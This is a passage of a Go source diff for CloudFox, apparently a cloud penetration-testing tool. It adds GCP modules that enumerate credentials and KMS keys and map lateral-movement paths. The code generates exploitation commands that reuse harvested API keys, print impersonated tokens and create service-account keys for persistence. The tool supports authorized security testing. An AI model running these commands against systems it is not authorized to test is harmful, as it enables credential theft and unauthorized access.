"fmt" + "strings" + "sync" + "time" + + apikeysservice "github.com/BishopFox/cloudfox/gcp/services/apikeysService" + hmacservice "github.com/BishopFox/cloudfox/gcp/services/hmacService" + IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPKeysCommand = &cobra.Command{ + Use: globals.GCP_KEYS_MODULE_NAME, + Aliases: []string{"credentials", "creds", "access-keys"}, + Short: "Enumerate all GCP keys (SA keys, HMAC keys, API keys)", + Long: `Enumerate all types of GCP keys and credentials. + +Key Types: +- SA Keys: Service account RSA keys for OAuth 2.0 authentication +- HMAC Keys: S3-compatible access keys for Cloud Storage +- API Keys: Project-level keys for API access (Maps, Translation, etc.) + +Features: +- Unified view of all credential types +- Shows key age and expiration status +- Identifies Google-managed vs user-managed keys +- Generates exploitation commands for penetration testing`, + Run: runGCPKeysCommand, +} + +// UnifiedKeyInfo represents a key from any source +type UnifiedKeyInfo struct { + ProjectID string + KeyType string // "SA Key", "HMAC", "API Key" + KeyID string + Owner string // Email for SA/HMAC, "Project-level" for API keys + DisplayName string + Origin string // "Google Managed", "User Managed", "Service Account", "User", "-" + Algorithm string // Key algorithm (e.g., "KEY_ALG_RSA_2048") + State string // "ACTIVE", "INACTIVE", "DELETED", "DISABLED" + CreateTime time.Time + ExpireTime time.Time + Expired bool + DWDEnabled bool // For SA keys - whether the SA has Domain-Wide Delegation enabled + Restrictions string // For API keys only + KeyString string // For API keys only (if accessible) +} + +type KeysModule struct { + gcpinternal.BaseGCPModule + Keys []UnifiedKeyInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type 
KeysOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o KeysOutput) TableFiles() []internal.TableFile { return o.Table } +func (o KeysOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPKeysCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_KEYS_MODULE_NAME) + if err != nil { + return + } + + module := &KeysModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Keys: []UnifiedKeyInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *KeysModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_KEYS_MODULE_NAME, m.processProject) + + if len(m.Keys) == 0 { + logger.InfoM("No keys found", globals.GCP_KEYS_MODULE_NAME) + return + } + + // Count by type + saKeyCount := 0 + hmacKeyCount := 0 + apiKeyCount := 0 + userManagedCount := 0 + + for _, key := range m.Keys { + switch key.KeyType { + case "SA Key": + saKeyCount++ + if key.Origin == "User Managed" { + userManagedCount++ + } + case "HMAC": + hmacKeyCount++ + case "API Key": + apiKeyCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d key(s) (%d SA keys [%d user-managed], %d HMAC keys, %d API keys)", + len(m.Keys), saKeyCount, userManagedCount, hmacKeyCount, apiKeyCount), globals.GCP_KEYS_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +func (m *KeysModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating keys in project: %s", projectID), globals.GCP_KEYS_MODULE_NAME) + } + + var projectKeys []UnifiedKeyInfo + + // 1. 
Enumerate Service Account Keys + iamService := IAMService.New() + serviceAccounts, err := iamService.ServiceAccounts(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_KEYS_MODULE_NAME, + fmt.Sprintf("Could not enumerate service accounts in project %s", projectID)) + } else { + for _, sa := range serviceAccounts { + // Check if DWD is enabled (OAuth2ClientID is set) + dwdEnabled := sa.OAuth2ClientID != "" + + for _, key := range sa.Keys { + // Extract key ID from full name + keyID := key.Name + if parts := strings.Split(key.Name, "/"); len(parts) > 0 { + keyID = parts[len(parts)-1] + } + + origin := "Google Managed" + if key.KeyType == "USER_MANAGED" { + origin = "User Managed" + } + + state := "ACTIVE" + if key.Disabled { + state = "DISABLED" + } + + expired := false + if !key.ValidBefore.IsZero() && time.Now().After(key.ValidBefore) { + expired = true + } + + projectKeys = append(projectKeys, UnifiedKeyInfo{ + ProjectID: projectID, + KeyType: "SA Key", + KeyID: keyID, + Owner: sa.Email, + DisplayName: sa.DisplayName, + Origin: origin, + Algorithm: key.KeyAlgorithm, + State: state, + CreateTime: key.ValidAfter, + ExpireTime: key.ValidBefore, + Expired: expired, + DWDEnabled: dwdEnabled, + }) + } + } + } + + // 2. 
Enumerate HMAC Keys + hmacService := hmacservice.New() + hmacKeys, err := hmacService.ListHMACKeys(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_KEYS_MODULE_NAME, + fmt.Sprintf("Could not enumerate HMAC keys in project %s", projectID)) + } else { + for _, key := range hmacKeys { + origin := "Service Account" + // Note: User HMAC keys are not enumerable via API, so all we see are SA keys + + projectKeys = append(projectKeys, UnifiedKeyInfo{ + ProjectID: projectID, + KeyType: "HMAC", + KeyID: key.AccessID, + Owner: key.ServiceAccountEmail, + DisplayName: "", + Origin: origin, + State: key.State, + CreateTime: key.TimeCreated, + Expired: false, // HMAC keys don't expire + }) + } + } + + // 3. Enumerate API Keys + apiKeysService := apikeysservice.New() + apiKeys, err := apiKeysService.ListAPIKeysWithKeyStrings(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_KEYS_MODULE_NAME, + fmt.Sprintf("Could not enumerate API keys in project %s", projectID)) + } else { + for _, key := range apiKeys { + // Extract key ID from full name + keyID := key.UID + if keyID == "" { + if parts := strings.Split(key.Name, "/"); len(parts) > 0 { + keyID = parts[len(parts)-1] + } + } + + state := "ACTIVE" + if !key.DeleteTime.IsZero() { + state = "DELETED" + } + + restrictions := "None" + if key.HasRestrictions { + restrictions = key.RestrictionType + if len(key.AllowedAPIs) > 0 { + restrictions = fmt.Sprintf("%s (APIs: %d)", key.RestrictionType, len(key.AllowedAPIs)) + } + } + + projectKeys = append(projectKeys, UnifiedKeyInfo{ + ProjectID: projectID, + KeyType: "API Key", + KeyID: keyID, + Owner: "Project-level", + DisplayName: key.DisplayName, + Origin: "-", + State: state, + CreateTime: key.CreateTime, + Expired: false, // API keys don't expire + Restrictions: restrictions, + KeyString: key.KeyString, + }) + } + } + + // Thread-safe append + m.mu.Lock() + m.Keys = append(m.Keys, projectKeys...) 
+ for _, key := range projectKeys { + m.addKeyToLoot(key) + } + m.mu.Unlock() +} + +func (m *KeysModule) initializeLootFiles() { + m.LootMap["keys-hmac-s3-commands"] = &internal.LootFile{ + Name: "keys-hmac-s3-commands", + Contents: "# HMAC S3-Compatible Access Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["keys-apikey-test-commands"] = &internal.LootFile{ + Name: "keys-apikey-test-commands", + Contents: "# API Key Test Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *KeysModule) addKeyToLoot(key UnifiedKeyInfo) { + switch key.KeyType { + case "HMAC": + if key.State == "ACTIVE" { + m.LootMap["keys-hmac-s3-commands"].Contents += fmt.Sprintf( + "# HMAC Key: %s\n"+ + "# Service Account: %s\n"+ + "# Project: %s\n\n"+ + "# Configure AWS CLI with HMAC credentials:\n"+ + "aws configure set aws_access_key_id %s\n"+ + "aws configure set aws_secret_access_key \n\n"+ + "# List buckets via S3-compatible endpoint:\n"+ + "aws --endpoint-url https://storage.googleapis.com s3 ls\n\n", + key.KeyID, + key.Owner, + key.ProjectID, + key.KeyID, + ) + } + + case "API Key": + if key.KeyString != "" { + m.LootMap["keys-apikey-test-commands"].Contents += fmt.Sprintf( + "# API Key: %s (%s)\n"+ + "# Project: %s\n"+ + "# Restrictions: %s\n\n"+ + "# Test API access:\n"+ + "curl -H 'X-Goog-Api-Key: %s' 'https://maps.googleapis.com/maps/api/geocode/json?address=test'\n"+ + "curl -H 'X-Goog-Api-Key: %s' 'https://translation.googleapis.com/language/translate/v2?q=Hello&target=es'\n\n", + key.KeyID, + key.DisplayName, + key.ProjectID, + key.Restrictions, + key.KeyString, + key.KeyString, + ) + } + } +} + +func (m *KeysModule) writeOutput(ctx context.Context, logger internal.Logger) { + header := []string{ + "Project ID", + "Project Name", + "Key Type", + "Key ID", + "Owner", + "Origin", + "Algorithm", + "State", + "Created", + "Expires", + "DWD", + "Restrictions", + } + + var body 
[][]string + for _, key := range m.Keys { + created := "-" + if !key.CreateTime.IsZero() { + created = key.CreateTime.Format("2006-01-02") + } + + expires := "-" + if !key.ExpireTime.IsZero() { + // Check for "never expires" (year 9999) + if key.ExpireTime.Year() >= 9999 { + expires = "Never" + } else { + expires = key.ExpireTime.Format("2006-01-02") + } + } + + dwd := "-" + if key.KeyType == "SA Key" { + if key.DWDEnabled { + dwd = "Yes" + } else { + dwd = "No" + } + } + + restrictions := "-" + if key.KeyType == "API Key" { + restrictions = key.Restrictions + } + + algorithm := key.Algorithm + if algorithm == "" { + algorithm = "-" + } + + body = append(body, []string{ + key.ProjectID, + m.GetProjectName(key.ProjectID), + key.KeyType, + key.KeyID, + key.Owner, + key.Origin, + algorithm, + key.State, + created, + expires, + dwd, + restrictions, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + tables := []internal.TableFile{ + { + Name: "keys", + Header: header, + Body: body, + }, + } + + output := KeysOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_KEYS_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/kms.go b/gcp/commands/kms.go new file mode 100644 index 00000000..3590f14c --- /dev/null +++ b/gcp/commands/kms.go @@ -0,0 +1,426 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + KMSService 
"github.com/BishopFox/cloudfox/gcp/services/kmsService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPKMSCommand = &cobra.Command{ + Use: globals.GCP_KMS_MODULE_NAME, + Aliases: []string{"crypto", "encryption-keys"}, + Short: "Enumerate Cloud KMS key rings and crypto keys with security analysis", + Long: `Enumerate Cloud KMS key rings and crypto keys across projects with security-relevant details. + +Features: +- Lists all KMS key rings and crypto keys +- Shows key purpose (encryption, signing, MAC) +- Identifies protection level (software, HSM, external) +- Shows rotation configuration and status +- Detects public key access via IAM +- Generates gcloud commands for key operations + +Security Columns: +- Purpose: ENCRYPT_DECRYPT, ASYMMETRIC_SIGN, ASYMMETRIC_DECRYPT, MAC +- Protection: SOFTWARE, HSM, EXTERNAL, EXTERNAL_VPC +- Rotation: Key rotation period and next rotation time +- PublicDecrypt: Whether allUsers/allAuthenticatedUsers can decrypt + +Attack Surface: +- Public decrypt access allows unauthorized data access +- Keys without rotation may be compromised long-term +- HSM vs software protection affects key extraction risk +- External keys indicate third-party key management`, + Run: runGCPKMSCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type KMSModule struct { + gcpinternal.BaseGCPModule + + KeyRings []KMSService.KeyRingInfo + CryptoKeys []KMSService.CryptoKeyInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type KMSOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o KMSOutput) TableFiles() []internal.TableFile { return o.Table } +func (o KMSOutput) LootFiles() []internal.LootFile { return o.Loot } + +// 
------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPKMSCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_KMS_MODULE_NAME) + if err != nil { + return + } + + module := &KMSModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + KeyRings: []KMSService.KeyRingInfo{}, + CryptoKeys: []KMSService.CryptoKeyInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *KMSModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_KMS_MODULE_NAME, m.processProject) + + if len(m.CryptoKeys) == 0 { + logger.InfoM("No KMS keys found", globals.GCP_KMS_MODULE_NAME) + return + } + + // Count security-relevant metrics + hsmCount := 0 + publicDecryptCount := 0 + noRotationCount := 0 + for _, key := range m.CryptoKeys { + if key.ProtectionLevel == "HSM" { + hsmCount++ + } + if key.IsPublicDecrypt { + publicDecryptCount++ + } + if key.RotationPeriod == "" && key.Purpose == "ENCRYPT_DECRYPT" { + noRotationCount++ + } + } + + msg := fmt.Sprintf("Found %d key ring(s), %d key(s)", len(m.KeyRings), len(m.CryptoKeys)) + if hsmCount > 0 { + msg += fmt.Sprintf(" [%d HSM]", hsmCount) + } + if publicDecryptCount > 0 { + msg += fmt.Sprintf(" [%d PUBLIC DECRYPT!]", publicDecryptCount) + } + logger.SuccessM(msg, globals.GCP_KMS_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *KMSModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating KMS in project: %s", projectID), globals.GCP_KMS_MODULE_NAME) + } + 
+ ks := KMSService.New() + + // Get key rings + keyRings, err := ks.KeyRings(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_KMS_MODULE_NAME, + fmt.Sprintf("Could not enumerate KMS key rings in project %s", projectID)) + return + } + + m.mu.Lock() + m.KeyRings = append(m.KeyRings, keyRings...) + m.mu.Unlock() + + // Get crypto keys + keys, err := ks.CryptoKeys(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_KMS_MODULE_NAME, + fmt.Sprintf("Could not enumerate KMS keys in project %s", projectID)) + } else { + m.mu.Lock() + m.CryptoKeys = append(m.CryptoKeys, keys...) + for _, key := range keys { + m.addKeyToLoot(key) + } + m.mu.Unlock() + } + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d key ring(s), %d key(s) in project %s", len(keyRings), len(keys), projectID), globals.GCP_KMS_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *KMSModule) initializeLootFiles() { + m.LootMap["kms-commands"] = &internal.LootFile{ + Name: "kms-commands", + Contents: "# KMS Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *KMSModule) addKeyToLoot(key KMSService.CryptoKeyInfo) { + m.LootMap["kms-commands"].Contents += fmt.Sprintf( + "## Key: %s (Project: %s, KeyRing: %s, Location: %s)\n"+ + "# Purpose: %s, Protection: %s\n", + key.Name, key.ProjectID, + key.KeyRing, key.Location, + key.Purpose, key.ProtectionLevel, + ) + + // Commands + m.LootMap["kms-commands"].Contents += fmt.Sprintf( + "\n# Describe key:\n"+ + "gcloud kms keys describe %s --keyring=%s --location=%s --project=%s\n"+ + "# Get IAM policy:\n"+ + "gcloud kms keys get-iam-policy %s --keyring=%s --location=%s --project=%s\n"+ + "# List versions:\n"+ + "gcloud kms keys versions list --key=%s --keyring=%s --location=%s 
--project=%s\n", + key.Name, key.KeyRing, key.Location, key.ProjectID, + key.Name, key.KeyRing, key.Location, key.ProjectID, + key.Name, key.KeyRing, key.Location, key.ProjectID, + ) + + // Purpose-specific commands + switch key.Purpose { + case "ENCRYPT_DECRYPT": + m.LootMap["kms-commands"].Contents += fmt.Sprintf( + "# Encrypt data:\n"+ + "echo -n 'secret data' | gcloud kms encrypt --key=%s --keyring=%s --location=%s --project=%s --plaintext-file=- --ciphertext-file=encrypted.bin\n"+ + "# Decrypt data:\n"+ + "gcloud kms decrypt --key=%s --keyring=%s --location=%s --project=%s --ciphertext-file=encrypted.bin --plaintext-file=-\n", + key.Name, key.KeyRing, key.Location, key.ProjectID, + key.Name, key.KeyRing, key.Location, key.ProjectID, + ) + case "ASYMMETRIC_SIGN": + m.LootMap["kms-commands"].Contents += fmt.Sprintf( + "# Sign data:\n"+ + "gcloud kms asymmetric-sign --key=%s --keyring=%s --location=%s --project=%s --version=1 --digest-algorithm=sha256 --input-file=data.txt --signature-file=signature.bin\n"+ + "# Get public key:\n"+ + "gcloud kms keys versions get-public-key 1 --key=%s --keyring=%s --location=%s --project=%s\n", + key.Name, key.KeyRing, key.Location, key.ProjectID, + key.Name, key.KeyRing, key.Location, key.ProjectID, + ) + case "ASYMMETRIC_DECRYPT": + m.LootMap["kms-commands"].Contents += fmt.Sprintf( + "# Decrypt data:\n"+ + "gcloud kms asymmetric-decrypt --key=%s --keyring=%s --location=%s --project=%s --version=1 --ciphertext-file=encrypted.bin --plaintext-file=-\n"+ + "# Get public key:\n"+ + "gcloud kms keys versions get-public-key 1 --key=%s --keyring=%s --location=%s --project=%s\n", + key.Name, key.KeyRing, key.Location, key.ProjectID, + key.Name, key.KeyRing, key.Location, key.ProjectID, + ) + } + + m.LootMap["kms-commands"].Contents += "\n" +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *KMSModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Crypto keys table 
with IAM columns - one row per IAM binding + keysHeader := []string{ + "Project Name", + "Project ID", + "Key Name", + "Key Ring", + "Location", + "Purpose", + "Protection", + "Version", + "State", + "Rotation", + "Public Encrypt", + "Public Decrypt", + "IAM Role", + "IAM Member", + } + + var keysBody [][]string + for _, key := range m.CryptoKeys { + // Format rotation + rotation := "-" + if key.RotationPeriod != "" { + rotation = formatDuration(key.RotationPeriod) + } + + // Format protection level + protection := key.ProtectionLevel + if protection == "" { + protection = "SOFTWARE" + } + + // Base row data (reused for each IAM binding) + baseRow := []string{ + m.GetProjectName(key.ProjectID), + key.ProjectID, + key.Name, + key.KeyRing, + key.Location, + formatPurpose(key.Purpose), + protection, + key.PrimaryVersion, + key.PrimaryState, + rotation, + boolToYesNo(key.IsPublicEncrypt), + boolToYesNo(key.IsPublicDecrypt), + } + + // If key has IAM bindings, create one row per binding + if len(key.IAMBindings) > 0 { + for _, binding := range key.IAMBindings { + row := make([]string, len(baseRow)+2) + copy(row, baseRow) + row[len(baseRow)] = binding.Role + row[len(baseRow)+1] = binding.Member + keysBody = append(keysBody, row) + } + } else { + // No IAM bindings - single row + row := make([]string, len(baseRow)+2) + copy(row, baseRow) + row[len(baseRow)] = "-" + row[len(baseRow)+1] = "-" + keysBody = append(keysBody, row) + } + } + + // Key rings table (summary) + keyRingsHeader := []string{ + "Project Name", + "Project ID", + "Key Ring", + "Location", + "Key Count", + } + + var keyRingsBody [][]string + for _, kr := range m.KeyRings { + keyRingsBody = append(keyRingsBody, []string{ + m.GetProjectName(kr.ProjectID), + kr.ProjectID, + kr.Name, + kr.Location, + fmt.Sprintf("%d", kr.KeyCount), + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: 
Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build table files + tableFiles := []internal.TableFile{} + + if len(keysBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_KMS_MODULE_NAME + "-keys", + Header: keysHeader, + Body: keysBody, + }) + } + + if len(keyRingsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_KMS_MODULE_NAME + "-keyrings", + Header: keyRingsHeader, + Body: keyRingsBody, + }) + } + + output := KMSOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_KMS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// Helper functions + +// formatPurpose formats key purpose for display +func formatPurpose(purpose string) string { + switch purpose { + case "ENCRYPT_DECRYPT": + return "Symmetric" + case "ASYMMETRIC_SIGN": + return "Sign" + case "ASYMMETRIC_DECRYPT": + return "Asymm Decrypt" + case "MAC": + return "MAC" + default: + return purpose + } +} + +// formatDuration formats a duration string for display +func formatDuration(duration string) string { + // Duration is in format like "7776000s" (90 days) + duration = strings.TrimSuffix(duration, "s") + if duration == "" { + return "-" + } + + // Parse seconds + var seconds int64 + fmt.Sscanf(duration, "%d", &seconds) + + if seconds == 0 { + return "-" + } + + days := seconds / 86400 + if days > 0 { + return fmt.Sprintf("%dd", days) + } + + hours := seconds / 3600 + if hours > 0 { + return fmt.Sprintf("%dh", hours) + } + + return fmt.Sprintf("%ds", seconds) +} diff --git 
a/gcp/commands/lateralmovement.go b/gcp/commands/lateralmovement.go new file mode 100644 index 00000000..2484a3a4 --- /dev/null +++ b/gcp/commands/lateralmovement.go @@ -0,0 +1,730 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + CloudRunService "github.com/BishopFox/cloudfox/gcp/services/cloudrunService" + ComputeEngineService "github.com/BishopFox/cloudfox/gcp/services/computeEngineService" + FunctionsService "github.com/BishopFox/cloudfox/gcp/services/functionsService" + GKEService "github.com/BishopFox/cloudfox/gcp/services/gkeService" + IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +// Module name constant +const GCP_LATERALMOVEMENT_MODULE_NAME string = "lateral-movement" + +var GCPLateralMovementCommand = &cobra.Command{ + Use: GCP_LATERALMOVEMENT_MODULE_NAME, + Aliases: []string{"lateral", "pivot"}, + Short: "Map lateral movement paths, credential theft vectors, and pivot opportunities", + Long: `Identify lateral movement opportunities within and across GCP projects. 
+ +Features: +- Maps service account impersonation chains (SA → SA → SA) +- Identifies token creator permissions (lateral movement via impersonation) +- Finds cross-project access paths +- Detects VM metadata abuse vectors +- Analyzes credential storage locations (secrets, environment variables) +- Maps attack paths from compromised identities +- Generates exploitation commands for penetration testing + +This module helps identify how an attacker could move laterally after gaining +initial access to a GCP environment.`, + Run: runGCPLateralMovementCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type ImpersonationChain struct { + StartIdentity string + TargetSA string + ChainLength int + Path []string // [identity] -> [sa1] -> [sa2] -> ... + RiskLevel string // CRITICAL, HIGH, MEDIUM + ExploitCommand string +} + +type TokenTheftVector struct { + ResourceType string // "instance", "function", "cloudrun", etc. + ResourceName string + ProjectID string + ServiceAccount string + AttackVector string // "metadata", "env_var", "startup_script", etc. 
+ RiskLevel string + ExploitCommand string +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type LateralMovementModule struct { + gcpinternal.BaseGCPModule + + ImpersonationChains []ImpersonationChain + TokenTheftVectors []TokenTheftVector + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type LateralMovementOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o LateralMovementOutput) TableFiles() []internal.TableFile { return o.Table } +func (o LateralMovementOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPLateralMovementCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_LATERALMOVEMENT_MODULE_NAME) + if err != nil { + return + } + + module := &LateralMovementModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ImpersonationChains: []ImpersonationChain{}, + TokenTheftVectors: []TokenTheftVector{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *LateralMovementModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Mapping lateral movement paths...", GCP_LATERALMOVEMENT_MODULE_NAME) + + // Process each project + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, GCP_LATERALMOVEMENT_MODULE_NAME, m.processProject) + + // Check results + totalPaths := len(m.ImpersonationChains) + len(m.TokenTheftVectors) + if totalPaths == 0 { + logger.InfoM("No lateral movement paths found", GCP_LATERALMOVEMENT_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d lateral movement path(s): %d impersonation 
chains, %d token theft vectors", + totalPaths, len(m.ImpersonationChains), len(m.TokenTheftVectors)), GCP_LATERALMOVEMENT_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *LateralMovementModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Analyzing lateral movement paths in project: %s", projectID), GCP_LATERALMOVEMENT_MODULE_NAME) + } + + // 1. Find impersonation chains + m.findImpersonationChains(ctx, projectID, logger) + + // 2. Find token theft vectors (compute instances, functions, etc.) + m.findTokenTheftVectors(ctx, projectID, logger) +} + +// findImpersonationChains finds service account impersonation paths +func (m *LateralMovementModule) findImpersonationChains(ctx context.Context, projectID string, logger internal.Logger) { + iamService := IAMService.New() + + // Get all service accounts + serviceAccounts, err := iamService.ServiceAccounts(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_LATERALMOVEMENT_MODULE_NAME, + fmt.Sprintf("Could not get service accounts in project %s", projectID)) + return + } + + // For each SA, check who can impersonate it using GetServiceAccountIAMPolicy + for _, sa := range serviceAccounts { + impersonationInfo, err := iamService.GetServiceAccountIAMPolicy(ctx, sa.Email, projectID) + if err != nil { + continue + } + + // Token creators can impersonate + for _, creator := range impersonationInfo.TokenCreators { + // Skip allUsers/allAuthenticatedUsers - those are handled separately + if creator == "allUsers" || creator == "allAuthenticatedUsers" { + continue + } + + chain := ImpersonationChain{ + StartIdentity: creator, + TargetSA: sa.Email, + ChainLength: 1, + Path: []string{creator, sa.Email}, + RiskLevel: "HIGH", + ExploitCommand: fmt.Sprintf("gcloud 
auth print-access-token --impersonate-service-account=%s", sa.Email), + } + + // If target SA has roles/owner or roles/editor, it's critical + if impersonationInfo.RiskLevel == "CRITICAL" { + chain.RiskLevel = "CRITICAL" + } + + m.mu.Lock() + m.ImpersonationChains = append(m.ImpersonationChains, chain) + m.addImpersonationChainToLoot(chain, projectID) + m.mu.Unlock() + } + + // Key creators can create persistent access + for _, creator := range impersonationInfo.KeyCreators { + if creator == "allUsers" || creator == "allAuthenticatedUsers" { + continue + } + + chain := ImpersonationChain{ + StartIdentity: creator, + TargetSA: sa.Email, + ChainLength: 1, + Path: []string{creator, sa.Email}, + RiskLevel: "CRITICAL", + ExploitCommand: fmt.Sprintf("gcloud iam service-accounts keys create key.json --iam-account=%s", sa.Email), + } + + m.mu.Lock() + m.ImpersonationChains = append(m.ImpersonationChains, chain) + m.addImpersonationChainToLoot(chain, projectID) + m.mu.Unlock() + } + } +} + +// findTokenTheftVectors finds compute resources where tokens can be stolen +func (m *LateralMovementModule) findTokenTheftVectors(ctx context.Context, projectID string, logger internal.Logger) { + // Find Compute Engine instances with service accounts + m.findComputeInstanceVectors(ctx, projectID, logger) + + // Find Cloud Functions with service accounts + m.findCloudFunctionVectors(ctx, projectID, logger) + + // Find Cloud Run services with service accounts + m.findCloudRunVectors(ctx, projectID, logger) + + // Find GKE clusters with node service accounts + m.findGKEVectors(ctx, projectID, logger) +} + +// findComputeInstanceVectors finds compute instances where tokens can be stolen via metadata server +func (m *LateralMovementModule) findComputeInstanceVectors(ctx context.Context, projectID string, logger internal.Logger) { + computeService := ComputeEngineService.New() + + instances, err := computeService.Instances(projectID) + if err != nil { + // Don't count as error - API may not 
